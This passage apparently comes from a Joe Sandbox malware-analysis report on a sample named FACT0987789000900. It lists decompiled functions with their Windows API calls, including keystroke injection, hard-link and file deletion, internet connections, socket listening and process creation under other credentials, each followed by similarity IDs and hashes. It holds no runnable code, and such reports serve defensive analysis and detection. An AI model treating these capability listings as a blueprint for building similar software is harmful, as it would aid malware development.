                                                                                                                • Opcode Fuzzy Hash: 0bed6eb8de13429f941b3a5287414bc0484d26afbe4b0f26fdb7c8e9f2d187f2
                                                                                                                • Instruction Fuzzy Hash: C451B738700342FBDB649F66D499F6EB3A5AF59314B20882FE946C72E1DB789C41870D
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(01325CC8,?), ref: 004FC544
                                                                                                                • ScreenToClient.USER32(?,00000002), ref: 004FC574
                                                                                                                • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 004FC5DA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3880355969-0
                                                                                                                • Opcode ID: 3b87575b8697faf3523ce85df2329abf6b178ef5cdd620ffcaca0e7d5ac41981
                                                                                                                • Instruction ID: c51a34ca086f1c88bc6aabdb4f801716ccd29aa7ef34101f16476b6fcbf842d2
                                                                                                                • Opcode Fuzzy Hash: 3b87575b8697faf3523ce85df2329abf6b178ef5cdd620ffcaca0e7d5ac41981
                                                                                                                • Instruction Fuzzy Hash: 23513B7590020CAFDF10DF68C9C0ABE7BB6AB55324F10865AFA559B290D734ED41CB94
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 004CC462
                                                                                                                • __itow.LIBCMT ref: 004CC49C
                                                                                                                  • Part of subcall function 004CC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 004CC753
                                                                                                                • SendMessageW.USER32(?,0000110A,00000001,?), ref: 004CC505
                                                                                                                • __itow.LIBCMT ref: 004CC55A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$__itow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3379773720-0
                                                                                                                • Opcode ID: 24a3669fe9e4c70938160946b6f24beaeaef1d826191e95da911ffecc4394ec3
                                                                                                                • Instruction ID: 1c1bad71509ea9d94b5b36f7d8963d37fb0fe6142a1e8a5730ff0298f21a8091
                                                                                                                • Opcode Fuzzy Hash: 24a3669fe9e4c70938160946b6f24beaeaef1d826191e95da911ffecc4394ec3
                                                                                                                • Instruction Fuzzy Hash: AD41EB35A002187FDF15DF55C892FEE7BB5AF44704F00406EF509A3281D7789A45CBA9
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 004D3966
                                                                                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 004D3982
                                                                                                                • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 004D39EF
                                                                                                                • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 004D3A4D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 432972143-0
                                                                                                                • Opcode ID: 1f78b11ff6e76dbd29acf1417e186b4ffa146e08a62c5160da8d696ee9050132
                                                                                                                • Instruction ID: b1190ac401324f63c7531a6661e44ebf7ba1a11e44a22ef5c53d1a9cf0557104
                                                                                                                • Opcode Fuzzy Hash: 1f78b11ff6e76dbd29acf1417e186b4ffa146e08a62c5160da8d696ee9050132
                                                                                                                • Instruction Fuzzy Hash: 824129B0A04208AAEF208F6598397FEBBB59B55312F04419BF4C1523C1C7BC9E85D76B
                                                                                                                APIs
                                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 004DE742
                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 004DE768
                                                                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 004DE78D
                                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 004DE7B9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 3321077145-0
                                                                                                                • Opcode ID: cae7004cfe91313b5e50292cf08f814fb431afc24258d4e3d04c5033320cb76c
                                                                                                                • Instruction ID: f4e594d473d7863915cc7a4aed2177f83dfe070cdfb9e579ae41caf9116182cf
                                                                                                                • Opcode Fuzzy Hash: cae7004cfe91313b5e50292cf08f814fb431afc24258d4e3d04c5033320cb76c
                                                                                                                • Instruction Fuzzy Hash: F6414939600610DFCF11EF2AC54594DBBE5BF59714B09849AE9069F362CB79FC00CB99
                                                                                                                APIs
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004FB5D1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InvalidateRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 634782764-0
                                                                                                                • Opcode ID: abaefb8a884f4e1c261f242b3c1b283daef2250745c45a525c6f3b5dd6e2815e
                                                                                                                • Instruction ID: e5a86026a9297175a52915cfad19921d18eaeae6c9b5c7fcc490cb164b4b0cd3
                                                                                                                • Opcode Fuzzy Hash: abaefb8a884f4e1c261f242b3c1b283daef2250745c45a525c6f3b5dd6e2815e
                                                                                                                • Instruction Fuzzy Hash: 4A31B07460020CBBEF208B18CC85FBA7B65EB07354F648513FB11D62E1C73CA9409ADA
                                                                                                                APIs
                                                                                                                • ClientToScreen.USER32(?,?), ref: 004FD807
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004FD87D
                                                                                                                • PtInRect.USER32(?,?,004FED5A), ref: 004FD88D
                                                                                                                • MessageBeep.USER32(00000000), ref: 004FD8FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1352109105-0
                                                                                                                • Opcode ID: f991335ec82ac4f7344ddb80653b33860cf10617ac06ea61650b0b0e144684d5
                                                                                                                • Instruction ID: edb1abf933d43b70852e7cbb60cdbbb9da8761721e02f444c37565d5024fb856
                                                                                                                • Opcode Fuzzy Hash: f991335ec82ac4f7344ddb80653b33860cf10617ac06ea61650b0b0e144684d5
                                                                                                                • Instruction Fuzzy Hash: E241AC70E0021CEFCB11EF59D884BAA7BF6BB45391F1881AAE6258B250C734E849DB54
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 004D3AB8
                                                                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 004D3AD4
                                                                                                                • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 004D3B34
                                                                                                                • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 004D3B92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 432972143-0
                                                                                                                • Opcode ID: cdcb85f51876893fa94c0a9e6293418d618490f34021d7283693bd0e80180083
                                                                                                                • Instruction ID: 7ff67f4c987832915adcbdb0f240cad3b5f367a6cbf7eb2705f0149dadcb9968
                                                                                                                • Opcode Fuzzy Hash: cdcb85f51876893fa94c0a9e6293418d618490f34021d7283693bd0e80180083
                                                                                                                • Instruction Fuzzy Hash: D531F630A00658AEEF208F6588397FE7BB69B55316F04015BE481933D2C77CAA45D76A
                                                                                                                APIs
                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004C4038
                                                                                                                • __isleadbyte_l.LIBCMT ref: 004C4066
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 004C4094
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 004C40CA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                • String ID:
                                                                                                                • API String ID: 3058430110-0
                                                                                                                • Opcode ID: 42a87d76c98dfa73335a9ef45d72c4de22db3953c4633f34765bcbf35b05ce30
                                                                                                                • Instruction ID: c3465f5a83690b8e46799ed2e77c628ac67722cb93c3e9752e263bb36c9370f1
                                                                                                                • Opcode Fuzzy Hash: 42a87d76c98dfa73335a9ef45d72c4de22db3953c4633f34765bcbf35b05ce30
                                                                                                                • Instruction Fuzzy Hash: 3B312434640206AFDB219F36C954FBB3BB5BF80310F15402EE65087290D739D890D794
                                                                                                                APIs
                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004E4358
                                                                                                                  • Part of subcall function 004E43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004E4401
                                                                                                                  • Part of subcall function 004E43E2: InternetCloseHandle.WININET(00000000), ref: 004E449E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$CloseConnectHandleOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1463438336-0
                                                                                                                • Opcode ID: eaec0d1c8de87e2a01910e500849bc6c1def029c05ab244eb19f2043d3c660c2
                                                                                                                • Instruction ID: 52ba1b604f8cf0bc82e2b0b43f6d72ea752963fa63ff8d7cba52f5d9b19f24b0
                                                                                                                • Opcode Fuzzy Hash: eaec0d1c8de87e2a01910e500849bc6c1def029c05ab244eb19f2043d3c660c2
                                                                                                                • Instruction Fuzzy Hash: 3721D131300641BBEB219F629C00FBBB7A9FF94716F10401FBA1596690DB799825A7A8
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004CAFAE
                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004CAFB5
                                                                                                                • CloseHandle.KERNEL32(00000004), ref: 004CAFCF
                                                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004CAFFE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                                                                                • String ID:
                                                                                                                • API String ID: 2621361867-0
                                                                                                                • Opcode ID: f9d708bf2c20936370cb09d930093002230fe680ead85206de1ca2c02da91620
                                                                                                                • Instruction ID: 8ebae11e5fa58137be61bd67a51fcd6bcd54db5035c3397c63cd5626a95141f1
                                                                                                                • Opcode Fuzzy Hash: f9d708bf2c20936370cb09d930093002230fe680ead85206de1ca2c02da91620
                                                                                                                • Instruction Fuzzy Hash: FF214F7610020DABDF428FA4DD09FEE7BB9EB44308F04801AF901A2161D3799D25EB65
                                                                                                                APIs
                                                                                                                • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 004E8AE0
                                                                                                                • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 004E8AF2
                                                                                                                • accept.WS2_32(00000000,00000000,00000000), ref: 004E8AFF
                                                                                                                • WSAGetLastError.WS2_32(00000000), ref: 004E8B16
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastacceptselect
                                                                                                                • String ID:
                                                                                                                • API String ID: 385091864-0
                                                                                                                • Opcode ID: a70b42e58fb488c247f8eb60b8a647fdceb66a44a6389c01a5e6cbf06b2f92e3
                                                                                                                • Instruction ID: 055957ad2267959f5c65f8801f87ae69e48ba715c61a3dd9e0e3dacf9b08e431
                                                                                                                • Opcode Fuzzy Hash: a70b42e58fb488c247f8eb60b8a647fdceb66a44a6389c01a5e6cbf06b2f92e3
                                                                                                                • Instruction Fuzzy Hash: CD21C672A001249FCB119F69C884ADEBBFCEF5A310F00816EF849D7290DB7899458FA4
                                                                                                                APIs
                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 004F8AA6
                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004F8AC0
                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004F8ACE
                                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 004F8ADC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long$AttributesLayered
                                                                                                                • String ID:
                                                                                                                • API String ID: 2169480361-0
                                                                                                                • Opcode ID: b78c7b5d6fba9cbea102230bbc6a4c44b220c1c56308a8e16f2de6518cb4715e
                                                                                                                • Instruction ID: c753bf035b6c16857428ddaa0d775512d96a816b4609b40ea66572892b0a2046
                                                                                                                • Opcode Fuzzy Hash: b78c7b5d6fba9cbea102230bbc6a4c44b220c1c56308a8e16f2de6518cb4715e
                                                                                                                • Instruction Fuzzy Hash: A1119331705115AFDB04AB19CC05FBA77A9EF96324F14816FF916CB2E1CBB8AC018798
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004D1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,004D0ABB,?,?,?,004D187A,00000000,000000EF,00000119,?,?), ref: 004D1E77
                                                                                                                  • Part of subcall function 004D1E68: lstrcpyW.KERNEL32(00000000,?,?,004D0ABB,?,?,?,004D187A,00000000,000000EF,00000119,?,?,00000000), ref: 004D1E9D
                                                                                                                  • Part of subcall function 004D1E68: lstrcmpiW.KERNEL32(00000000,?,004D0ABB,?,?,?,004D187A,00000000,000000EF,00000119,?,?), ref: 004D1ECE
                                                                                                                • lstrlenW.KERNEL32(?,00000002,?,?,?,?,004D187A,00000000,000000EF,00000119,?,?,00000000), ref: 004D0AD4
                                                                                                                • lstrcpyW.KERNEL32(00000000,?,?,004D187A,00000000,000000EF,00000119,?,?,00000000), ref: 004D0AFA
                                                                                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,004D187A,00000000,000000EF,00000119,?,?,00000000), ref: 004D0B2E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                                                                • String ID: cdecl
                                                                                                                • API String ID: 4031866154-3896280584
                                                                                                                • Opcode ID: 6cdcfa955c2a122233ea05ba5e0b8fda4c00aec85da234dffedd079c9a20b1ad
                                                                                                                • Instruction ID: db05c46f0d6bf17b8b6ed73084658d6f9b0abb44cd04f0b3b0e363e78fb409d9
                                                                                                                • Opcode Fuzzy Hash: 6cdcfa955c2a122233ea05ba5e0b8fda4c00aec85da234dffedd079c9a20b1ad
                                                                                                                • Instruction Fuzzy Hash: E411A236200305BFDB259F64D819E7A77B8FF55314F80402BE806CB350EB75A840D7A5
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 004C2FB5
                                                                                                                  • Part of subcall function 004B395C: __FF_MSGBANNER.LIBCMT ref: 004B3973
                                                                                                                  • Part of subcall function 004B395C: __NMSG_WRITE.LIBCMT ref: 004B397A
                                                                                                                  • Part of subcall function 004B395C: RtlAllocateHeap.NTDLL(01300000,00000000,00000001), ref: 004B399F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
